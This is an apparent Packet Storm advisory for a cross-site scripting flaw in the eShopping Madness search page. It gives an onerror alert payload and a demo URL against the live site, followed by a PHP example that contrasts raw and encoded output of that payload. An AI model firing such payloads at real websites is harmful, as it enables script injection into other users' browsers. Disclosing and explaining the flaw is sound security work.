eShopping Madness Cross Site Scripting

2011-08-23T00:00:00
ID PACKETSTORM:104357
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-23T00:00:00

Description

`# Exploit Title: eShopping Madness Stored XSS  
# Date: 2011  
# Author: Eyup CELIK  
# Version: All versions  
# Tested on: All versions are vulnerable  
  
ISSUE  
  
Cross Site Scripting can be done using the command input  
  
Vulnerable Page:  
search.php (Search Modules)  
  
Exploit:  
"/></a></><img src=1.gif onerror=alert(1)>  
  
Demo:  
http://www.eshoppingmadness.com/search.php?s=%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E  
  
  
Thanks,  
  
  
Eyup CELIK  
Information Technologies Security Specialist  
http://www.eyupcelik.com.tr  
`
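
The payload above begins with `"/>`, which suggests the search term is echoed inside a quoted HTML attribute; that placement is an assumption, since the advisory does not show the source of search.php. The PHP below is an added example, not the application's or the reporter's code, with hypothetical markup and function names: it renders the advisory's search term with and without output encoding and lists the elements an HTML parser finds in each result.

```php
<?php
// Added illustration, not eShopping Madness source. The <input> markup and
// all function names are hypothetical.

// Assumed vulnerable pattern: raw search term placed in a quoted attribute.
function render_unsafe(string $term): string
{
    return '<input type="text" name="s" value="' . $term . '" />';
}

// Hardened: encode at output time; ENT_QUOTES covers both quote characters.
function render_safe(string $term): string
{
    $enc = htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="s" value="' . $enc . '" />';
}

// Parse a fragment and report each element with its event-handler attributes.
function elements_seen(string $fragment): array
{
    $prev = libxml_use_internal_errors(true);   // tolerate malformed markup
    $doc = new DOMDocument();
    $doc->loadHTML('<div>' . $fragment . '</div>');
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    $seen = [];
    foreach ($doc->getElementsByTagName('*') as $el) {
        if (in_array($el->nodeName, ['html', 'body', 'div'], true)) {
            continue;   // wrapper elements, not part of the fragment
        }
        $handlers = [];
        foreach ($el->attributes as $attr) {
            if (stripos($attr->nodeName, 'on') === 0) {
                $handlers[] = $attr->nodeName;
            }
        }
        $seen[] = $el->nodeName . ($handlers ? ' [' . implode(',', $handlers) . ']' : '');
    }
    return $seen;
}

// Search term from the advisory's demo URL, decoded as PHP exposes $_GET['s'].
$term = urldecode('%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E');

echo 'unsafe: ', implode(', ', elements_seen(render_unsafe($term))), PHP_EOL;
echo 'safe:   ', implode(', ', elements_seen(render_safe($term))), PHP_EOL;
```

With encoding applied, the search term stays inside the `value` attribute as text, so the parser sees only the `input` element.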